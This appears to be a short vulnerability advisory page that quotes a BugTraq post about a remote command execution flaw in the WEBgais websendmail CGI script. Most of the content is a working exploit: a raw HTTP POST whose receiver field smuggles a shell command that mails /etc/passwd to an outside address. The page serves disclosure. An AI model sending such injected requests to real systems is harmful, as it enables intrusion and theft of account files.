|
|
WEBgais websendmail Remote Command Execution Vulnerability
From the BugTraq post by Razvan Dragomirescu: telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a |
|
Privacy Statement |